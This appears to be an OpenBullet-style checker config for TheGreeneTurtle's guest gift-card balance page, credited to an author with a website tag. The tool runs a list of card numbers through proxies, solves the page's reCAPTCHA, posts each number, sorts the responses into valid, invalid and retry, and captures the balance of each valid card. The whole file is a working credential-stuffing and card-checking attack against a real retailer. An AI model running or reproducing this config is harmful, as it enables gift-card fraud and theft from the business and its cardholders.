[SETTINGS]
{
  "Name": "TheGreeneTurtle",
  "SuggestedBots": 1,
  "LastModified": "2018-06-19T21:06:20.6219765+00:00",
  "AdditionalInfo": "",
  "Author": "Dreamzje [ KEEPIT.ONLINE ]",
  "Version": "1.0.0",
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "Cards",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#GET_REQUEST REQUEST GET "https://thegreeneturtle.myguestaccount.com/guest/nologin/account-balance" AutoRedirect=TRUE 
  CONTENT "" 
  CONTENTTYPE "" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Connection: keep-alive" 
RECAPTCHA "https://thegreeneturtle.myguestaccount.com/guest/nologin/account-balance" "6LdndBYUAAAAAIE_sQA2y29GSRaKJHKx2DodPT6m" -> VAR "RECAPTCHA" 
PARSE "<SOURCE>" LR "<form method=\"post\" action=\"/guest/nologin/account-balance\" role=\"form\" class=\"form-horizontal\"><input value=\"true\" type=\"hidden\" name=\"" "\"" Recursive=FALSE -> VAR "RANDOMTOKEN" "" "" 
PARSE "<SOURCE>" LR "<button class=\"btn btn-default nologinCardnumberSubmitButton\" name=\"" "\"" Recursive=FALSE -> VAR "SUBMIT" "" "" 
#POST_REQUEST REQUEST POST "https://thegreeneturtle.myguestaccount.com/guest/nologin/account-balance" AutoRedirect=TRUE 
  CONTENT "<RANDOMTOKEN>=true&cardnum=<USER>&g-recaptcha-response=<RECAPTCHA>&<SUBMIT>=" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Referer: https://thegreeneturtle.myguestaccount.com/guest/nologin/account-balance" 
  HEADER "Accept-Language: en-US,en;q=0.9" 
  HEADER "Origin: https://thegreeneturtle.myguestaccount.com" 
  HEADER "Upgrade-Insecure-Requests: 1" 
  HEADER "Cache-Control: max-age=0" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN Retry OR 
    KEY "Invalid CAPTCHA. Please try again." 
  KEYCHAIN Success OR 
    KEY "Stored Value" 
  KEYCHAIN Failure OR 
    KEY "Invalid" 
PARSE "<SOURCE>" LR "<div class=\"col-md-2\">$" "</div>" Recursive=FALSE -> CAP "Balance" "$" "" 
